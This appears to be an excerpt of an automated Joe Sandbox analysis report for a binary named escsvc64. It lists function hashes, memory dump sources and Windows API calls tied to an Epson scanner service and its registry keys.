Opcode Fuzzy Hash: 81c1d04c05283fd2a1325daf2c7e4ba4b4c701fcda75abe4fb00a0c260c9d664
Instruction Fuzzy Hash: 46B1CFF360878486F766CE17B6043AE7AE1E75A7D4F240115EF4923AFAD779C8408B48

Function 000000014000420E Relevance: 1.5, Strings: 1, Instructions: 253COMMON

Download Yara Rule

Strings

-, xrefs: 0000000140004564

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: cc105c1c9ce3bac7ae62e62a748aff5b23afc70919c97d87a9511dca8811ff66
Instruction ID: 94e25bba52440a2cca7ea8ee516e65074c5b4943095f1fee069ad109c40d3143
Opcode Fuzzy Hash: cc105c1c9ce3bac7ae62e62a748aff5b23afc70919c97d87a9511dca8811ff66
Instruction Fuzzy Hash: 3AB1BEF260878486FB62CF16B5443AA6BE0F7897D4F140115FF4A13AFADB79C9448B44

Function 0000000140004112 Relevance: 1.5, Strings: 1, Instructions: 210COMMON

Download Yara Rule

Strings

-, xrefs: 0000000140004564

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 97eedac39f7bfedb38e4d82418d8d0a5aad94e2e9198739ae9b92dec815e7bfd
Instruction ID: 64f448d262f21ed941de6c020a9d0f3a60cb7ec8839f9869103a210ec6ba61c5
Opcode Fuzzy Hash: 97eedac39f7bfedb38e4d82418d8d0a5aad94e2e9198739ae9b92dec815e7bfd
Instruction Fuzzy Hash: A89100F2A0878446FB62CE16B5043EA6AE0F7597D4F180115FF49176F6EB79C880CB48

Function 00000001400040A9 Relevance: 1.4, Strings: 1, Instructions: 189COMMON

Download Yara Rule

Strings

-, xrefs: 0000000140004564

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 38ad8a242f868f7af08282b4cbf198ccb50b62c679b78f933d7899405d201d8c
Instruction ID: 4da5bba44bb66270887b95eda529c48334dd4f935bc46f25b0db5c7bb74f89e1
Opcode Fuzzy Hash: 38ad8a242f868f7af08282b4cbf198ccb50b62c679b78f933d7899405d201d8c
Instruction Fuzzy Hash: 3E8101F260878486FB62CE16B5043AA7AE0F7497D8F140115FF4A17AF6DB79C840CB48

Function 0000000140004012 Relevance: 1.4, Strings: 1, Instructions: 188COMMON

Download Yara Rule

Strings

-, xrefs: 0000000140004564

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 20d9e0a11a594cb2d75081cad8ba9c6f5020e3f73ed6864717b6a692171ac5b5
Instruction ID: be0ece8c6c099251b535272f2d67437119a85b849efd07fc89c03c42969d6caf
Opcode Fuzzy Hash: 20d9e0a11a594cb2d75081cad8ba9c6f5020e3f73ed6864717b6a692171ac5b5
Instruction Fuzzy Hash: AB81BEF250878486FB62CF16B1043AA7AE0F75A788F144115FF8913AF6DB79C944CB49

Function 01FDA230 Relevance: .4, Instructions: 371COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717618022.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1fd0000_escsvc64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6c0af3afa3ce2cd943dfd938cfb517e3e80b3f38b163d67ad5b76e19be9c73d
Instruction ID: 1ab9dc2a728de2c54295283671bdceedceb72b475419f6a1816216006517022c
Opcode Fuzzy Hash: c6c0af3afa3ce2cd943dfd938cfb517e3e80b3f38b163d67ad5b76e19be9c73d
Instruction Fuzzy Hash: A9B11B30A1CB588FDB29DB7C88481BD7BE3FB95710F5C065ED586C3192DA7298428786

Function 01FD11A8 Relevance: .3, Instructions: 316COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717618022.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1fd0000_escsvc64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac996540c99712a2732c3a0cd771fdd5b82a7297ebbc67a68a116eb0094e006c
Instruction ID: a8022b5bd3f2af7c75c5f27e5b92f072981298f6b6b8cf6472e0ff9862a41c39
Opcode Fuzzy Hash: ac996540c99712a2732c3a0cd771fdd5b82a7297ebbc67a68a116eb0094e006c
Instruction Fuzzy Hash: 06B16D30A1CA488FEB69DF68D8846AEBBF2FB98305F14422EE44AD3151DF75D581CB41

Function 0000000180001280 Relevance: .3, Instructions: 316COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1718056200.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3c3617ae956e6184eb8065b69f6db008006156971f66254c3dd82276b5a9f0f
Instruction ID: 677c0758eb96fa0f58adb50d014ce7746cb49a23bd9658e5ec2e981993f68fea
Opcode Fuzzy Hash: e3c3617ae956e6184eb8065b69f6db008006156971f66254c3dd82276b5a9f0f
Instruction Fuzzy Hash: 24B12D30A18A4C8FEB95DF68D8847EDB7F1FB98345F10822EE44AD3151DF749A858B41

Function 0000000140003040 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09105ba1de81c0eabae60244af1f5e217578faf070f434ce134c4c62d05422bb
Instruction ID: cb9468e5dd3d17a1f1a5f45de5d21e32605364da385cad08a5688e468ff26665
Opcode Fuzzy Hash: 09105ba1de81c0eabae60244af1f5e217578faf070f434ce134c4c62d05422bb
Instruction Fuzzy Hash: 9C31DEB670475042FB27DA67B4117EBA19ABB9C7E8F284125BF5907BE6DE38C8118700

Function 0000000140009660 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0ffe5f4428bf9eeef88d2c30132eb356a74c290e10bf32207ccb9b55cee9dc4
Instruction ID: 55cee6301af4064af0a7b8dd5ff135198a46271af006edfdb84eb076825c30f3
Opcode Fuzzy Hash: e0ffe5f4428bf9eeef88d2c30132eb356a74c290e10bf32207ccb9b55cee9dc4
Instruction Fuzzy Hash: 31318DB222465046F367EF37B942B9EAA51A7C87E0F114615BF2A476F7CB7888018B14

Function 0000000140008D00 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0259813f3e940429c9912dbf36fea80308d35746dd903408b396d40507f961b0
Instruction ID: 0e9b1d565009756a5861b1773b79cbb7b290ff6b7f3b08d1189dcf1d4d27c9f8
Opcode Fuzzy Hash: 0259813f3e940429c9912dbf36fea80308d35746dd903408b396d40507f961b0
Instruction Fuzzy Hash: EF319EB221164046F766AF37BA42B9E6A51A7987F0F215716BF79077F3CB3884018718

Function 000000014000F210 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45ba4ea63d73a6e75ec1ab626a6aaa22a6c04ea535b2695e22b789f8ff2ae24a
Instruction ID: ca43f0d881ef68448f7dc613d54f2faea86250d2d978d8cd49a0b55ef0f1022f
Opcode Fuzzy Hash: 45ba4ea63d73a6e75ec1ab626a6aaa22a6c04ea535b2695e22b789f8ff2ae24a
Instruction Fuzzy Hash: 5331F8B261024086F317EF77B9917EE7551A7883E0F258629BB2607AF7CF3884009714

Function 00000001400027D0 Relevance: 24.2, APIs: 16, Instructions: 174
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 000000014000280E
SysAllocString.OLEAUT32 ref: 000000014000281E
SysAllocString.OLEAUT32 ref: 000000014000282E
lstrlenW.KERNEL32 ref: 000000014000290F
lstrcpynW.KERNEL32 ref: 0000000140002929
lstrcmpW.KERNEL32 ref: 000000014000293A
lstrcmpW.KERNEL32 ref: 000000014000294F
lstrcmpW.KERNEL32 ref: 0000000140002964
lstrcmpW.KERNEL32 ref: 0000000140002979
SysFreeString.OLEAUT32 ref: 0000000140002990
SysFreeString.OLEAUT32 ref: 000000014000299E
SysFreeString.OLEAUT32 ref: 00000001400029AC
SysFreeString.OLEAUT32 ref: 00000001400029BA
SysFreeString.OLEAUT32 ref: 0000000140002A6C
SysFreeString.OLEAUT32 ref: 0000000140002A75
SysFreeString.OLEAUT32 ref: 0000000140002A7E

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: String$Free$lstrcmp$Alloc$lstrcpynlstrlen
String ID:
API String ID: 1252115942-0
Opcode ID: 03eb1b18c4707c08c21059389df7a0a4c71f297fbe5ad549f874feaa8339716f
Instruction ID: 10d5fb0b984341c209e7259ff63cebb7c5da4f613dd4f39bc1d8205302deed1f
Opcode Fuzzy Hash: 03eb1b18c4707c08c21059389df7a0a4c71f297fbe5ad549f874feaa8339716f
Instruction Fuzzy Hash: 5D711476204B8586EB61DF26E84439AB7A4F789FD4F554022EF8E87B28DF39C449C700

Function 0000000140006BB0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 150COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,ProgramFiles(x86),00000000,0000000140002F9B,?,?,00000000,00000001400030CF,?,?,?,?,?,0000000140002290), ref: 0000000140006BD2
GetLastError.KERNEL32(?,?,?,ProgramFiles(x86),00000000,0000000140002F9B,?,?,00000000,00000001400030CF,?,?,?,?,?,0000000140002290), ref: 0000000140006BEC
GetEnvironmentStringsW.KERNEL32(?,?,?,ProgramFiles(x86),00000000,0000000140002F9B,?,?,00000000,00000001400030CF,?,?,?,?,?,0000000140002290), ref: 0000000140006C11
FreeEnvironmentStringsW.KERNEL32(?,?,?,ProgramFiles(x86),00000000,0000000140002F9B,?,?,00000000,00000001400030CF,?,?,?,?,?,0000000140002290), ref: 0000000140006C54
FreeEnvironmentStringsW.KERNEL32(?,?,?,ProgramFiles(x86),00000000,0000000140002F9B,?,?,00000000,00000001400030CF,?,?,?,?,?,0000000140002290), ref: 0000000140006C72
GetEnvironmentStrings.KERNEL32(?,?,?,ProgramFiles(x86),00000000,0000000140002F9B,?,?,00000000,00000001400030CF,?,?,?,?,?,0000000140002290), ref: 0000000140006C89
MultiByteToWideChar.KERNEL32(?,?,?,ProgramFiles(x86),00000000,0000000140002F9B,?,?,00000000,00000001400030CF,?,?,?,?,?,0000000140002290), ref: 0000000140006CB7
FreeEnvironmentStringsA.KERNEL32(?,?,?,ProgramFiles(x86),00000000,0000000140002F9B,?,?,00000000,00000001400030CF,?,?,?,?,?,0000000140002290), ref: 0000000140006CF3
FreeEnvironmentStringsA.KERNEL32(?,?,?,ProgramFiles(x86),00000000,0000000140002F9B,?,?,00000000,00000001400030CF,?,?,?,?,?,0000000140002290), ref: 0000000140006D99

Strings

ProgramFiles(x86), xrefs: 0000000140006BBB

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
String ID: ProgramFiles(x86)
API String ID: 1232609184-3631460872
Opcode ID: c37cc93dd8c1a900cb13687d03ad4eb6d5e772f06f7a123cf1ea6dbd35c8654b
Instruction ID: b63bd8ed9ac3dab9224ed48c9e233b2d44c75ae47e14bd980ce9fa98a46d85b3
Opcode Fuzzy Hash: c37cc93dd8c1a900cb13687d03ad4eb6d5e772f06f7a123cf1ea6dbd35c8654b
Instruction Fuzzy Hash: CD51A3B170464045FA62DF33B8447A96792EB4DBE0F080725FFAA977F1EA79C4408301

Function 0000000140001710 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 87servicesleepCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32 ref: 0000000140001720
OpenServiceW.ADVAPI32 ref: 000000014000174A
StartServiceW.ADVAPI32 ref: 0000000140001764
QueryServiceStatusEx.ADVAPI32 ref: 000000014000178F
GetTickCount.KERNEL32 ref: 00000001400017AA
Sleep.KERNEL32(?), ref: 00000001400017F4
QueryServiceStatusEx.ADVAPI32 ref: 0000000140001817
GetTickCount.KERNEL32 ref: 0000000140001827
GetTickCount.KERNEL32 ref: 0000000140001835
CloseServiceHandle.ADVAPI32 ref: 0000000140001852
CloseServiceHandle.ADVAPI32 ref: 000000014000186F

Strings

EpsonScanSvc, xrefs: 0000000140001732

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: Service$CountTick$CloseHandleOpenQueryStatus$ManagerSleepStart
String ID: EpsonScanSvc
API String ID: 1984259928-1444984947
Opcode ID: f3d182e5e534bf6b48d903bd0ac76c9d6b4826b5f6df23701516f99d534de01c
Instruction ID: a7f394007434b1b02e697beb098547fb0025df285e32183c449bfbd724071357
Opcode Fuzzy Hash: f3d182e5e534bf6b48d903bd0ac76c9d6b4826b5f6df23701516f99d534de01c
Instruction Fuzzy Hash: 5B314B7130969186FBA6DF17B84479A63A1F7CDBC0F148015FB8E47AA8CE39C645CB00

Function 0000000140001960 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 190registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00000001400019A7
RegEnumKeyExW.ADVAPI32 ref: 00000001400019FB
RegOpenKeyExW.ADVAPI32 ref: 0000000140001A91
RegQueryValueExW.ADVAPI32 ref: 0000000140001AD0
lstrlenW.KERNEL32 ref: 0000000140001B2A
RegCloseKey.ADVAPI32 ref: 0000000140001B37
RegEnumKeyExW.ADVAPI32 ref: 0000000140001C3A
RegCloseKey.ADVAPI32 ref: 0000000140001C55

Strings

Supported, xrefs: 0000000140001AA9
SOFTWARE\WOW6432Node\EPSON\EPSON Scan, xrefs: 0000000140001988

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: CloseEnumOpen$QueryValuelstrlen
String ID: SOFTWARE\WOW6432Node\EPSON\EPSON Scan$Supported
API String ID: 2486029594-1622175670
Opcode ID: 87ad4f67b9b781d28baa77e7320f6897fffe9f52e03f0c83eb102f117d29a89b
Instruction ID: 8e4f15a3a503a55ddbbdac29224ee9fe645b7f6789ebbbbd2d6754d1847acb3f
Opcode Fuzzy Hash: 87ad4f67b9b781d28baa77e7320f6897fffe9f52e03f0c83eb102f117d29a89b
Instruction Fuzzy Hash: D5818076715B8182EB62CF26F4507EAB3A4F7C97C8F504116EB8907AA4EF79C519CB00

Function 000000014000A3B0 Relevance: 16.9, APIs: 11, Instructions: 355COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,00000100,00000020,00000020,000000014000AA1A), ref: 000000014000A41A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000100,00000020,00000020,000000014000AA1A), ref: 000000014000A42A
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000100,00000020,00000020,000000014000AA1A), ref: 000000014000A4E4
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000100,00000020,00000020,000000014000AA1A), ref: 000000014000A591
LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,00000100,00000020,00000020,000000014000AA1A), ref: 000000014000A5B4
LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,00000100,00000020,00000020,000000014000AA1A), ref: 000000014000A5FD
LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,00000100,00000020,00000020,000000014000AA1A), ref: 000000014000A694
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000100,00000020,00000020,000000014000AA1A), ref: 000000014000A6D5
LCMapStringA.KERNEL32(?,?,?,?,?,?,?,?,00000100,00000020,00000020,000000014000AA1A), ref: 000000014000A783
LCMapStringA.KERNEL32(?,?,?,?,?,?,?,?,00000100,00000020,00000020,000000014000AA1A), ref: 000000014000A836
LCMapStringA.KERNEL32(?,?,?,?,?,?,?,?,00000100,00000020,00000020,000000014000AA1A), ref: 000000014000A8BC

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: String$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1775797328-0
Opcode ID: 60cc79fb6dc40bda5f948520c0e7e0d2ff632d05875a93aef8353d7857435f43
Instruction ID: 5f3b594da2a3d9375c03c46df1faf838da500cf477c195cfbbe80b2a65d6330f
Opcode Fuzzy Hash: 60cc79fb6dc40bda5f948520c0e7e0d2ff632d05875a93aef8353d7857435f43
Instruction Fuzzy Hash: B1E1ADB26007808AEB66CF26B8407E977E1F74DBE8F448615FB6947BE9DB78C5418700

Function 0000000140002300 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 91stringsynchronizationCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 00000001400023C7
EnumProcessModules.PSAPI ref: 00000001400023E8
GetModuleBaseNameW.PSAPI ref: 0000000140002407
lstrcmpiW.KERNEL32 ref: 000000014000241F
WaitForSingleObject.KERNEL32 ref: 0000000140002431
CloseHandle.KERNEL32 ref: 0000000140002441

Strings

EsDevApp.exe, xrefs: 0000000140002410
<unknown>, xrefs: 0000000140002380

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: Process$BaseCloseEnumHandleModuleModulesNameObjectOpenSingleWaitlstrcmpi
String ID: <unknown>$EsDevApp.exe
API String ID: 3347754066-197797983
Opcode ID: 531f60bc9a968f6c4e8abcd5da6a658d7eb65ae74af477b5c7ef866473c81541
Instruction ID: 6cfe2537a428b480afb9f9cbeed3f753b1c7f8177941936a06842b6620a5b642
Opcode Fuzzy Hash: 531f60bc9a968f6c4e8abcd5da6a658d7eb65ae74af477b5c7ef866473c81541
Instruction Fuzzy Hash: F0416071304A8182EB26DB16F4503EA6391FB8C7C8F844126EB8D57BA5DE3DC246C740

Function 0000000140006020 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 79libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,?,?,0000000140006208,?,?,?,0000000140004C49,?,?,?,?,0000000140003C3C), ref: 0000000140006046
GetModuleHandleA.KERNEL32 ref: 0000000140006089
GetProcAddress.KERNEL32 ref: 00000001400060D8
GetProcAddress.KERNEL32 ref: 00000001400060F0

Strings

KERNEL32.DLL, xrefs: 000000014000603F
DecodePointer, xrefs: 00000001400060E6
EncodePointer, xrefs: 00000001400060CE
.mixcrt, xrefs: 00000001400060B0

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: .mixcrt$DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1646373207-1161742486
Opcode ID: e729c7a7b6060703b922ff775d9c5f5377de67280fac83615df89c31571cf52b
Instruction ID: ab796fa72a7d5732366149f6b830d43232af647d3f7bfa51478b0964a882ca94
Opcode Fuzzy Hash: e729c7a7b6060703b922ff775d9c5f5377de67280fac83615df89c31571cf52b
Instruction Fuzzy Hash: 1E315872201BA191EB56DB22E848BEB73A5F7487C4F404125EB8D57370EFB9C549C704

Function 01FD49DC Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 460COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 01FD4A39

Part of subcall function 01FD6D9C: __GetUnwindTryBlock.LIBCMT ref: 01FD6DDF
Part of subcall function 01FD6D9C: __SetUnwindTryBlock.LIBVCRUNTIME ref: 01FD6E04

Is_bad_exception_allowed.LIBVCRUNTIME ref: 01FD4B11
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 01FD4D5F
std::bad_alloc::bad_alloc.LIBCMT ref: 01FD4E6C

Strings

csm, xrefs: 01FD4B34
csm, xrefs: 01FD4ABA
csm, xrefs: 01FD4A53

Memory Dump Source

Source File: 00000000.00000002.1717618022.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1fd0000_escsvc64.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 0c4b8d619ca458689e2f74fd3b4ee5de20de0ba7d33cc5e2b3dde7c6a46069a9
Instruction ID: df13b6875e81e02eb55980566244e073e3e003d1ff429a01902101bf15bbabe9
Opcode Fuzzy Hash: 0c4b8d619ca458689e2f74fd3b4ee5de20de0ba7d33cc5e2b3dde7c6a46069a9
Instruction Fuzzy Hash: 20E1E230918B0D9FDB14EF6CC8856B9B7E2FB68310F58065ED489C7652DB32E481CB82

